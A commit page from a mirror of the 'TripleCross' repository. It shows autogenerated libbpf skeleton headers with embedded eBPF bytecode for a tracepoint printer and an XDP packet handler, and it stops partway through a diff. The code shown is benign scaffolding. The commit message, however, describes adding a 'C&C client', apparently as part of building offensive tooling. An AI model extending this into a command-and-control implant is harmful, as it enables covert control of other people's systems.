admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-20 16:53:07 +08:00
Code Issues Packages Projects Releases Wiki Activity

Finished xdp ebpf program, successfully showing packets received. Added client from Umbra, it will be the C&C client

Browse Source
This commit is contained in:
h3xduck
2021-11-22 18:58:58 -05:00
parent 23c7331d16
commit b04200526c
19 changed files with 522 additions and 371 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
src/.output/minimal.bpf.o
View File

Binary file not shown.

BIN
src/.output/minimal.o
View File

Binary file not shown.

233
src/.output/minimal.skel.h
View File

@@ -1,233 +0,0 @@
/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
/* THIS FILE IS AUTOGENERATED! */
#ifndef __MINIMAL_BPF_SKEL_H__
#define __MINIMAL_BPF_SKEL_H__
#include <stdlib.h>
#include <bpf/libbpf.h>
struct minimal_bpf {
struct bpf_object_skeleton *skeleton;
struct bpf_object *obj;
struct {
struct bpf_map *rodata;
struct bpf_map *bss;
} maps;
struct {
struct bpf_program *handle_tp;
} progs;
struct {
struct bpf_link *handle_tp;
} links;
struct minimal_bpf__bss {
int my_pid;
} *bss;
struct minimal_bpf__rodata {
char handle_tp_____fmt[28];
} *rodata;
};
static void
minimal_bpf__destroy(struct minimal_bpf *obj)
{
if (!obj)
return;
if (obj->skeleton)
bpf_object__destroy_skeleton(obj->skeleton);
free(obj);
}
static inline int
minimal_bpf__create_skeleton(struct minimal_bpf *obj);
static inline struct minimal_bpf *
minimal_bpf__open_opts(const struct bpf_object_open_opts *opts)
{
struct minimal_bpf *obj;
obj = (struct minimal_bpf *)calloc(1, sizeof(*obj));
if (!obj)
return NULL;
if (minimal_bpf__create_skeleton(obj))
goto err;
if (bpf_object__open_skeleton(obj->skeleton, opts))
goto err;
return obj;
err:
minimal_bpf__destroy(obj);
return NULL;
}
static inline struct minimal_bpf *
minimal_bpf__open(void)
{
return minimal_bpf__open_opts(NULL);
}
static inline int
minimal_bpf__load(struct minimal_bpf *obj)
{
return bpf_object__load_skeleton(obj->skeleton);
}
static inline struct minimal_bpf *
minimal_bpf__open_and_load(void)
{
struct minimal_bpf *obj;
obj = minimal_bpf__open();
if (!obj)
return NULL;
if (minimal_bpf__load(obj)) {
minimal_bpf__destroy(obj);
return NULL;
}
return obj;
}
static inline int
minimal_bpf__attach(struct minimal_bpf *obj)
{
return bpf_object__attach_skeleton(obj->skeleton);
}
static inline void
minimal_bpf__detach(struct minimal_bpf *obj)
{
return bpf_object__detach_skeleton(obj->skeleton);
}
static inline int
minimal_bpf__create_skeleton(struct minimal_bpf *obj)
{
struct bpf_object_skeleton *s;
s = (struct bpf_object_skeleton *)calloc(1, sizeof(*s));
if (!s)
return -1;
obj->skeleton = s;
s->sz = sizeof(*s);
s->name = "minimal_bpf";
s->obj = &obj->obj;
/* maps */
s->map_cnt = 2;
s->map_skel_sz = sizeof(*s->maps);
s->maps = (struct bpf_map_skeleton *)calloc(s->map_cnt, s->map_skel_sz);
if (!s->maps)
goto err;
s->maps[0].name = "minimal_.rodata";
s->maps[0].map = &obj->maps.rodata;
s->maps[0].mmaped = (void **)&obj->rodata;
s->maps[1].name = "minimal_.bss";
s->maps[1].map = &obj->maps.bss;
s->maps[1].mmaped = (void **)&obj->bss;
/* programs */
s->prog_cnt = 1;
s->prog_skel_sz = sizeof(*s->progs);
s->progs = (struct bpf_prog_skeleton *)calloc(s->prog_cnt, s->prog_skel_sz);
if (!s->progs)
goto err;
s->progs[0].name = "handle_tp";
s->progs[0].prog = &obj->progs.handle_tp;
s->progs[0].link = &obj->links.handle_tp;
s->data_sz = 2400;
s->data = (void *)"\
\x7f\x45\x4c\x46\x02\x01\x01\0\0\0\0\0\0\0\0\0\x01\0\xf7\0\x01\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\xe0\x05\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\x40\0\x0e\0\
\x0d\0\x85\0\0\0\x0e\0\0\0\x77\0\0\0\x20\0\0\0\x18\x01\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\x61\x11\0\0\0\0\0\0\x5d\x01\x05\0\0\0\0\0\x18\x01\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\xb7\x02\0\0\x1c\0\0\0\xbf\x03\0\0\0\0\0\0\x85\0\0\0\x06\0\0\0\xb7\0\0\0\0\
\0\0\0\x95\0\0\0\0\0\0\0\x44\x75\x61\x6c\x20\x42\x53\x44\x2f\x47\x50\x4c\0\0\0\
\0\x42\x50\x46\x20\x74\x72\x69\x67\x67\x65\x72\x65\x64\x20\x66\x72\x6f\x6d\x20\
\x50\x49\x44\x20\x25\x64\x2e\x0a\0\x9f\xeb\x01\0\x18\0\0\0\0\0\0\0\x10\x01\0\0\
\x10\x01\0\0\x1c\x01\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\0\x01\0\0\x0d\x03\0\0\
\0\x01\0\0\0\x01\0\0\0\x05\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\x01\x09\0\0\0\x01\
\0\0\x0c\x02\0\0\0\xcd\0\0\0\0\0\0\x01\x01\0\0\0\x08\0\0\x01\0\0\0\0\0\0\0\x03\
\0\0\0\0\x05\0\0\0\x07\0\0\0\x0d\0\0\0\xd2\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\
\xe6\0\0\0\0\0\0\x0e\x06\0\0\0\x01\0\0\0\xee\0\0\0\0\0\0\x0e\x03\0\0\0\x01\0\0\
\0\0\0\0\0\0\0\0\x0a\x05\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0\x0a\0\0\0\x07\0\0\0\
\x1c\0\0\0\xf5\0\0\0\0\0\0\x0e\x0b\0\0\0\0\0\0\0\x07\x01\0\0\x01\0\0\x0f\0\0\0\
\0\x09\0\0\0\0\0\0\0\x04\0\0\0\x0c\x01\0\0\x01\0\0\x0f\0\0\0\0\x0c\0\0\0\0\0\0\
\0\x1c\0\0\0\x14\x01\0\0\x01\0\0\x0f\0\0\0\0\x08\0\0\0\0\0\0\0\x0d\0\0\0\0\x63\
\x74\x78\0\x69\x6e\x74\0\x68\x61\x6e\x64\x6c\x65\x5f\x74\x70\0\x74\x70\x2f\x73\
\x79\x73\x63\x61\x6c\x6c\x73\x2f\x73\x79\x73\x5f\x65\x6e\x74\x65\x72\x5f\x77\
\x72\x69\x74\x65\0\x2f\x68\x6f\x6d\x65\x2f\x6f\x73\x62\x6f\x78\x65\x73\x2f\x54\
\x46\x47\x2f\x73\x72\x63\x2f\x65\x62\x70\x66\x2f\x6d\x69\x6e\x69\x6d\x61\x6c\
\x2e\x62\x70\x66\x2e\x63\0\x09\x69\x6e\x74\x20\x70\x69\x64\x20\x3d\x20\x62\x70\
\x66\x5f\x67\x65\x74\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x70\x69\x64\x5f\x74\
\x67\x69\x64\x28\x29\x20\x3e\x3e\x20\x33\x32\x3b\0\x09\x69\x66\x20\x28\x70\x69\
\x64\x20\x21\x3d\x20\x6d\x79\x5f\x70\x69\x64\x29\0\x09\x62\x70\x66\x5f\x70\x72\
\x69\x6e\x74\x6b\x28\x22\x42\x50\x46\x20\x74\x72\x69\x67\x67\x65\x72\x65\x64\
\x20\x66\x72\x6f\x6d\x20\x50\x49\x44\x20\x25\x64\x2e\x5c\x6e\x22\x2c\x20\x70\
\x69\x64\x29\x3b\0\x7d\0\x63\x68\x61\x72\0\x5f\x5f\x41\x52\x52\x41\x59\x5f\x53\
\x49\x5a\x45\x5f\x54\x59\x50\x45\x5f\x5f\0\x4c\x49\x43\x45\x4e\x53\x45\0\x6d\
\x79\x5f\x70\x69\x64\0\x68\x61\x6e\x64\x6c\x65\x5f\x74\x70\x2e\x5f\x5f\x5f\x5f\
\x66\x6d\x74\0\x2e\x62\x73\x73\0\x2e\x72\x6f\x64\x61\x74\x61\0\x6c\x69\x63\x65\
\x6e\x73\x65\0\x9f\xeb\x01\0\x20\0\0\0\0\0\0\0\x14\0\0\0\x14\0\0\0\x6c\0\0\0\
\x80\0\0\0\0\0\0\0\x08\0\0\0\x13\0\0\0\x01\0\0\0\0\0\0\0\x04\0\0\0\x10\0\0\0\
\x13\0\0\0\x06\0\0\0\0\0\0\0\x2f\0\0\0\x58\0\0\0\x0c\x34\0\0\x08\0\0\0\x2f\0\0\
\0\x58\0\0\0\x27\x34\0\0\x10\0\0\0\x2f\0\0\0\x85\0\0\0\x0d\x3c\0\0\x28\0\0\0\
\x2f\0\0\0\x85\0\0\0\x06\x3c\0\0\x30\0\0\0\x2f\0\0\0\x99\0\0\0\x02\x48\0\0\x58\
\0\0\0\x2f\0\0\0\xcb\0\0\0\x01\x54\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\x9b\0\0\0\0\0\x02\0\x58\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x14\0\0\0\x01\0\
\x05\0\0\0\0\0\0\0\0\0\x1c\0\0\0\0\0\0\0\0\0\0\0\x03\0\x02\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x03\0\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x93\0\0\0\
\x11\0\x03\0\0\0\0\0\0\0\0\0\x0d\0\0\0\0\0\0\0\x2b\0\0\0\x12\0\x02\0\0\0\0\0\0\
\0\0\0\x68\0\0\0\0\0\0\0\x6b\0\0\0\x11\0\x04\0\0\0\0\0\0\0\0\0\x04\0\0\0\0\0\0\
\0\x10\0\0\0\0\0\0\0\x01\0\0\0\x07\0\0\0\x30\0\0\0\0\0\0\0\x01\0\0\0\x04\0\0\0\
\xf0\0\0\0\0\0\0\0\0\0\0\0\x07\0\0\0\x08\x01\0\0\0\0\0\0\x0a\0\0\0\x04\0\0\0\
\x20\x01\0\0\0\0\0\0\0\0\0\0\x05\0\0\0\x2c\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x40\
\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x50\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x60\0\0\0\
\0\0\0\0\0\0\0\0\x03\0\0\0\x70\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x80\0\0\0\0\0\0\
\0\0\0\0\0\x03\0\0\0\x90\0\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\x0c\x0b\x03\0\x2e\x74\
\x65\x78\x74\0\x2e\x72\x65\x6c\x2e\x42\x54\x46\x2e\x65\x78\x74\0\x68\x61\x6e\
\x64\x6c\x65\x5f\x74\x70\x2e\x5f\x5f\x5f\x5f\x66\x6d\x74\0\x2e\x62\x73\x73\0\
\x68\x61\x6e\x64\x6c\x65\x5f\x74\x70\0\x2e\x6c\x6c\x76\x6d\x5f\x61\x64\x64\x72\
\x73\x69\x67\0\x2e\x72\x65\x6c\x74\x70\x2f\x73\x79\x73\x63\x61\x6c\x6c\x73\x2f\
\x73\x79\x73\x5f\x65\x6e\x74\x65\x72\x5f\x77\x72\x69\x74\x65\0\x6c\x69\x63\x65\
\x6e\x73\x65\0\x6d\x79\x5f\x70\x69\x64\0\x2e\x73\x74\x72\x74\x61\x62\0\x2e\x73\
\x79\x6d\x74\x61\x62\0\x2e\x72\x6f\x64\x61\x74\x61\0\x2e\x72\x65\x6c\x2e\x42\
\x54\x46\0\x4c\x49\x43\x45\x4e\x53\x45\0\x4c\x42\x42\x30\x5f\x32\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\x06\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\x47\0\0\0\x01\0\0\0\x06\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\0\x40\0\0\0\0\0\0\0\x68\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x08\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x63\0\0\0\x01\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xa8\0\0\0\0\0\
\0\0\x0d\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x26\0\
\0\0\x08\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb8\0\0\0\0\0\0\0\x04\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x82\0\0\0\x01\0\0\0\
\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb8\0\0\0\0\0\0\0\x1c\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x8e\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\xd4\0\0\0\0\0\0\0\x44\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\x0b\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
\x18\x03\0\0\0\0\0\0\xa0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\x7a\0\0\0\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb8\x03\0\0\0\0\
\0\0\xc0\0\0\0\0\0\0\0\x0d\0\0\0\x05\0\0\0\x08\0\0\0\0\0\0\0\x18\0\0\0\0\0\0\0\
\x43\0\0\0\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x78\x04\0\0\0\0\0\0\x20\0\
\0\0\0\0\0\0\x08\0\0\0\x02\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x8a\0\0\0\
\x09\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x98\x04\0\0\0\0\0\0\x30\0\0\0\0\0\0\
\0\x08\0\0\0\x06\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x07\0\0\0\x09\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xc8\x04\0\0\0\0\0\0\x70\0\0\0\0\0\0\0\x08\0\0\
\0\x07\0\0\0\x08\0\0\0\0\0\0\0\x10\0\0\0\0\0\0\0\x35\0\0\0\x03\x4c\xff\x6f\0\0\
\0\x80\0\0\0\0\0\0\0\0\0\0\0\0\x38\x05\0\0\0\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x72\0\0\0\x03\0\0\0\0\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\x3b\x05\0\0\0\0\0\0\xa2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\0";
return 0;
err:
bpf_object__destroy_skeleton(s);
return -1;
}
#endif /* __MINIMAL_BPF_SKEL_H__ */

BIN
src/.output/xdp_filter.bpf.o
View File

Binary file not shown.

BIN
src/.output/xdp_filter.o
View File

Binary file not shown.

251
src/.output/xdp_filter.skel.h
View File

@@ -11,7 +11,7 @@ struct xdp_filter_bpf {
struct bpf_object_skeleton *skeleton; struct bpf_object_skeleton *skeleton;
struct bpf_object *obj; struct bpf_object *obj;
struct { struct {
struct bpf_map *rb; struct bpf_map *rodata;
} maps; } maps;
struct { struct {
struct bpf_program *xdp_receive; struct bpf_program *xdp_receive;
@@ -19,6 +19,10 @@ struct xdp_filter_bpf {
struct { struct {
struct bpf_link *xdp_receive; struct bpf_link *xdp_receive;
} links; } links;
struct xdp_filter_bpf__rodata {
char xdp_receive_____fmt[15];
char xdp_receive_____fmt_1[15];
} *rodata;
}; };
static void static void
@@ -113,8 +117,9 @@ xdp_filter_bpf__create_skeleton(struct xdp_filter_bpf *obj)
if (!s->maps) if (!s->maps)
goto err; goto err;
s->maps[0].name = "rb"; s->maps[0].name = "xdp_filt.rodata";
s->maps[0].map = &obj->maps.rb; s->maps[0].map = &obj->maps.rodata;
s->maps[0].mmaped = (void **)&obj->rodata;
/* programs */ /* programs */
s->prog_cnt = 1; s->prog_cnt = 1;
@@ -127,119 +132,137 @@ xdp_filter_bpf__create_skeleton(struct xdp_filter_bpf *obj)
s->progs[0].prog = &obj->progs.xdp_receive; s->progs[0].prog = &obj->progs.xdp_receive;
s->progs[0].link = &obj->links.xdp_receive; s->progs[0].link = &obj->links.xdp_receive;
s->data_sz = 3128; s->data_sz = 3568;
s->data = (void *)"\ s->data = (void *)"\
\x7f\x45\x4c\x46\x02\x01\x01\0\0\0\0\0\0\0\0\0\x01\0\xf7\0\x01\0\0\0\0\0\0\0\0\ \x7f\x45\x4c\x46\x02\x01\x01\0\0\0\0\0\0\0\0\0\x01\0\xf7\0\x01\0\0\0\0\0\0\0\0\
\0\0\0\0\0\0\0\0\0\0\0\x38\x09\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\x40\0\x0c\0\ \0\0\0\0\0\0\0\0\0\0\0\xb0\x0a\0\0\0\0\0\0\0\0\0\0\x40\0\0\0\0\0\x40\0\x0d\0\
\x0b\0\x61\x12\0\0\0\0\0\0\x61\x11\x04\0\0\0\0\0\xbf\x23\0\0\0\0\0\0\x07\x03\0\ \x0c\0\xbf\x16\0\0\0\0\0\0\x18\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xb7\x02\0\0\x0f\
\0\x0e\0\0\0\x2d\x13\x11\0\0\0\0\0\xbf\x23\0\0\0\0\0\0\x07\x03\0\0\x22\0\0\0\ \0\0\0\x85\0\0\0\x06\0\0\0\xb7\0\0\0\x02\0\0\0\x61\x61\0\0\0\0\0\0\x61\x62\x04\
\x2d\x13\x0e\0\0\0\0\0\xbf\x23\0\0\0\0\0\0\x07\x03\0\0\x2a\0\0\0\x2d\x13\x0b\0\ \0\0\0\0\0\xbf\x13\0\0\0\0\0\0\x07\x03\0\0\x0e\0\0\0\x2d\x23\x11\0\0\0\0\0\xbf\
\0\0\0\0\x71\x24\x17\0\0\0\0\0\x55\x04\x09\0\x11\0\0\0\x69\x24\x24\0\0\0\0\0\ \x13\0\0\0\0\0\0\x07\x03\0\0\x22\0\0\0\x2d\x23\x0e\0\0\0\0\0\xbf\x13\0\0\0\0\0\
\x55\x04\x07\0\x13\x8d\0\0\xbf\x24\0\0\0\0\0\0\x07\x04\0\0\x2e\0\0\0\x2d\x14\ \0\x07\x03\0\0\x2a\0\0\0\x2d\x23\x0b\0\0\0\0\0\x71\x14\x17\0\0\0\0\0\x55\x04\
\x04\0\0\0\0\0\x69\x21\x26\0\0\0\0\0\x55\x01\x02\0\0\x0c\0\0\x71\x31\0\0\0\0\0\ \x09\0\x11\0\0\0\x69\x14\x24\0\0\0\0\0\x55\x04\x07\0\x13\x8d\0\0\xbf\x14\0\0\0\
\0\x15\x01\x02\0\x74\0\0\0\xb7\0\0\0\x02\0\0\0\x95\0\0\0\0\0\0\0\x71\x21\x2b\0\ \0\0\0\x07\x04\0\0\x2e\0\0\0\x2d\x24\x04\0\0\0\0\0\x69\x12\x26\0\0\0\0\0\x55\
\0\0\0\0\x15\x01\x01\0\x65\0\0\0\x05\0\xfb\xff\0\0\0\0\x71\x21\x2c\0\0\0\0\0\ \x02\x02\0\0\x0c\0\0\x71\x32\0\0\0\0\0\0\x15\x02\x01\0\x74\0\0\0\x95\0\0\0\0\0\
\x55\x01\xf9\xff\x73\0\0\0\x71\x21\x2d\0\0\0\0\0\xb7\0\0\0\x01\0\0\0\x15\x01\ \0\0\x71\x12\x2b\0\0\0\0\0\x15\x02\x01\0\x65\0\0\0\x05\0\xfc\xff\0\0\0\0\x71\
\x01\0\x74\0\0\0\xb7\0\0\0\x02\0\0\0\x95\0\0\0\0\0\0\0\x44\x75\x61\x6c\x20\x42\ \x12\x2c\0\0\0\0\0\x55\x02\xfa\xff\x73\0\0\0\x71\x11\x2d\0\0\0\0\0\x55\x01\xf8\
\x53\x44\x2f\x47\x50\x4c\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x9f\xeb\x01\0\ \xff\x74\0\0\0\x18\x01\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\xb7\x02\0\0\x0f\0\0\0\x85\
\x18\0\0\0\0\0\0\0\xa0\x01\0\0\xa0\x01\0\0\x1c\x02\0\0\0\0\0\0\0\0\0\x02\x03\0\ \0\0\0\x06\0\0\0\xb7\0\0\0\x01\0\0\0\x05\0\xf2\xff\0\0\0\0\x44\x75\x61\x6c\x20\
\0\0\x01\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\x01\0\0\0\0\0\0\0\x03\0\0\0\0\x02\0\ \x42\x53\x44\x2f\x47\x50\x4c\0\x42\x50\x46\x20\x74\x72\x69\x67\x67\x65\x72\x65\
\0\0\x04\0\0\0\x1b\0\0\0\x05\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\0\0\0\0\0\0\0\ \x64\x0a\0\x42\x50\x46\x20\x66\x69\x6e\x69\x73\x68\x65\x64\x0a\x20\0\x9f\xeb\
\x02\x06\0\0\0\0\0\0\0\0\0\0\x03\0\0\0\0\x02\0\0\0\x04\0\0\0\0\0\x04\0\0\0\0\0\ \x01\0\x18\0\0\0\0\0\0\0\x74\x01\0\0\x74\x01\0\0\xa3\x02\0\0\0\0\0\0\0\0\0\x02\
\x02\0\0\x04\x10\0\0\0\x19\0\0\0\x01\0\0\0\0\0\0\0\x1e\0\0\0\x05\0\0\0\x40\0\0\ \x02\0\0\0\x01\0\0\0\x06\0\0\x04\x18\0\0\0\x08\0\0\0\x03\0\0\0\0\0\0\0\x0d\0\0\
\0\x2a\0\0\0\0\0\0\x0e\x07\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\x0a\0\0\0\x2d\0\0\ \0\x03\0\0\0\x20\0\0\0\x16\0\0\0\x03\0\0\0\x40\0\0\0\x20\0\0\0\x03\0\0\0\x60\0\
\0\x06\0\0\x04\x18\0\0\0\x34\0\0\0\x0b\0\0\0\0\0\0\0\x39\0\0\0\x0b\0\0\0\x20\0\ \0\0\x30\0\0\0\x03\0\0\0\x80\0\0\0\x3f\0\0\0\x03\0\0\0\xa0\0\0\0\x4e\0\0\0\0\0\
\0\0\x42\0\0\0\x0b\0\0\0\x40\0\0\0\x4c\0\0\0\x0b\0\0\0\x60\0\0\0\x5c\0\0\0\x0b\ \0\x08\x04\0\0\0\x54\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\0\0\0\0\x01\0\0\x0d\
\0\0\0\x80\0\0\0\x6b\0\0\0\x0b\0\0\0\xa0\0\0\0\x7a\0\0\0\0\0\0\x08\x0c\0\0\0\ \x06\0\0\0\x61\0\0\0\x01\0\0\0\x65\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\x01\x69\0\
\x80\0\0\0\0\0\0\x01\x04\0\0\0\x20\0\0\0\0\0\0\0\x01\0\0\x0d\x02\0\0\0\x8d\0\0\ \0\0\x01\0\0\x0c\x05\0\0\0\x48\x02\0\0\0\0\0\x01\x01\0\0\0\x08\0\0\x01\0\0\0\0\
\0\x09\0\0\0\x91\0\0\0\x01\0\0\x0c\x0d\0\0\0\x01\x02\0\0\0\0\0\x01\x01\0\0\0\ \0\0\0\x03\0\0\0\0\x08\0\0\0\x0a\0\0\0\x0d\0\0\0\x4d\x02\0\0\0\0\0\x01\x04\0\0\
\x08\0\0\x01\0\0\0\0\0\0\0\x03\0\0\0\0\x0f\0\0\0\x04\0\0\0\x0d\0\0\0\x06\x02\0\ \0\x20\0\0\0\x61\x02\0\0\0\0\0\x0e\x09\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x0a\x08\0\
\0\0\0\0\x0e\x10\0\0\0\x01\0\0\0\x0e\x02\0\0\x01\0\0\x0f\0\0\0\0\x08\0\0\0\0\0\ \0\0\0\0\0\0\0\0\0\x03\0\0\0\0\x0c\0\0\0\x0a\0\0\0\x0f\0\0\0\x69\x02\0\0\0\0\0\
\0\0\x10\0\0\0\x14\x02\0\0\x01\0\0\x0f\0\0\0\0\x11\0\0\0\0\0\0\0\x0d\0\0\0\0\ \x0e\x0d\0\0\0\0\0\0\0\x7d\x02\0\0\0\0\0\x0e\x0d\0\0\0\0\0\0\0\x93\x02\0\0\x02\
\x69\x6e\x74\0\x5f\x5f\x41\x52\x52\x41\x59\x5f\x53\x49\x5a\x45\x5f\x54\x59\x50\ \0\0\x0f\0\0\0\0\x0e\0\0\0\0\0\0\0\x0f\0\0\0\x0f\0\0\0\x0f\0\0\0\x0f\0\0\0\x9b\
\x45\x5f\x5f\0\x74\x79\x70\x65\0\x6d\x61\x78\x5f\x65\x6e\x74\x72\x69\x65\x73\0\ \x02\0\0\x01\0\0\x0f\0\0\0\0\x0b\0\0\0\0\0\0\0\x0d\0\0\0\0\x78\x64\x70\x5f\x6d\
\x72\x62\0\x78\x64\x70\x5f\x6d\x64\0\x64\x61\x74\x61\0\x64\x61\x74\x61\x5f\x65\ \x64\0\x64\x61\x74\x61\0\x64\x61\x74\x61\x5f\x65\x6e\x64\0\x64\x61\x74\x61\x5f\
\x6e\x64\0\x64\x61\x74\x61\x5f\x6d\x65\x74\x61\0\x69\x6e\x67\x72\x65\x73\x73\ \x6d\x65\x74\x61\0\x69\x6e\x67\x72\x65\x73\x73\x5f\x69\x66\x69\x6e\x64\x65\x78\
\x5f\x69\x66\x69\x6e\x64\x65\x78\0\x72\x78\x5f\x71\x75\x65\x75\x65\x5f\x69\x6e\ \0\x72\x78\x5f\x71\x75\x65\x75\x65\x5f\x69\x6e\x64\x65\x78\0\x65\x67\x72\x65\
\x64\x65\x78\0\x65\x67\x72\x65\x73\x73\x5f\x69\x66\x69\x6e\x64\x65\x78\0\x5f\ \x73\x73\x5f\x69\x66\x69\x6e\x64\x65\x78\0\x5f\x5f\x75\x33\x32\0\x75\x6e\x73\
\x5f\x75\x33\x32\0\x75\x6e\x73\x69\x67\x6e\x65\x64\x20\x69\x6e\x74\0\x63\x74\ \x69\x67\x6e\x65\x64\x20\x69\x6e\x74\0\x63\x74\x78\0\x69\x6e\x74\0\x78\x64\x70\
\x78\0\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\0\x78\x64\x70\0\x2f\x68\x6f\ \x5f\x72\x65\x63\x65\x69\x76\x65\0\x78\x64\x70\x5f\x70\x72\x6f\x67\0\x2f\x68\
\x6d\x65\x2f\x6f\x73\x62\x6f\x78\x65\x73\x2f\x54\x46\x47\x2f\x73\x72\x63\x2f\ \x6f\x6d\x65\x2f\x6f\x73\x62\x6f\x78\x65\x73\x2f\x54\x46\x47\x2f\x73\x72\x63\
\x65\x62\x70\x66\x2f\x78\x64\x70\x5f\x66\x69\x6c\x74\x65\x72\x2e\x62\x70\x66\ \x2f\x65\x62\x70\x66\x2f\x78\x64\x70\x5f\x66\x69\x6c\x74\x65\x72\x2e\x62\x70\
\x2e\x63\0\x20\x20\x20\x20\x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\x20\x3d\x20\ \x66\x2e\x63\0\x69\x6e\x74\x20\x78\x64\x70\x5f\x72\x65\x63\x65\x69\x76\x65\x28\
\x28\x76\x6f\x69\x64\x20\x2a\x29\x28\x6c\x6f\x6e\x67\x29\x63\x74\x78\x2d\x3e\ \x73\x74\x72\x75\x63\x74\x20\x78\x64\x70\x5f\x6d\x64\x20\x2a\x63\x74\x78\x29\0\
\x64\x61\x74\x61\x3b\0\x20\x20\x20\x20\x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\ \x20\x20\x20\x20\x62\x70\x66\x5f\x70\x72\x69\x6e\x74\x6b\x28\x22\x42\x50\x46\
\x5f\x65\x6e\x64\x20\x3d\x20\x28\x76\x6f\x69\x64\x20\x2a\x29\x28\x6c\x6f\x6e\ \x20\x74\x72\x69\x67\x67\x65\x72\x65\x64\x5c\x6e\x22\x29\x3b\0\x20\x20\x20\x20\
\x67\x29\x63\x74\x78\x2d\x3e\x64\x61\x74\x61\x5f\x65\x6e\x64\x3b\0\x20\x20\x20\ \x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\x20\x3d\x20\x28\x76\x6f\x69\x64\x20\
\x20\x69\x66\x20\x28\x28\x76\x6f\x69\x64\x20\x2a\x29\x65\x74\x68\x20\x2b\x20\ \x2a\x29\x28\x6c\x6f\x6e\x67\x29\x63\x74\x78\x2d\x3e\x64\x61\x74\x61\x3b\0\x20\
\x73\x69\x7a\x65\x6f\x66\x28\x2a\x65\x74\x68\x29\x20\x3e\x20\x64\x61\x74\x61\ \x20\x20\x20\x76\x6f\x69\x64\x20\x2a\x64\x61\x74\x61\x5f\x65\x6e\x64\x20\x3d\
\x5f\x65\x6e\x64\x29\0\x20\x20\x20\x20\x69\x66\x20\x28\x69\x70\x2d\x3e\x70\x72\ \x20\x28\x76\x6f\x69\x64\x20\x2a\x29\x28\x6c\x6f\x6e\x67\x29\x63\x74\x78\x2d\
